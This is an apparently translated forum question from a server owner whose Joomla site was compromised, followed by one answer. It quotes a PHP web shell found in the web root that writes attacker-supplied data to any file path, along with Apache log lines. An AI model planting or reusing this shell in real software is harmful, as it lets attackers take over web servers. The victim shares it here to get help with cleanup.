我的服务器最近由于 Joomla 和 allow_url_fopen = ON 而受到攻击,我发现我的服务器根目录中有多个 php 文件包含此内容
Restricted accoss
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);
所以我关闭了 allow_url_fopen 并删除了所有这些文件。现在,我的网站可以正常运行几分钟,但它每隔几秒钟就会向该地址发出请求,并在 error_log 中显示此消息
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
我在 access_log 中经常看到这个
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
那么这正常吗?
答案1
似乎有人在滥用 Google App Engine。检查您的 Apache 访问日志中的 IP 地址,用户代理字符串应该包含他们的应用 ID。然后您可以向 Google 报告此滥用行为。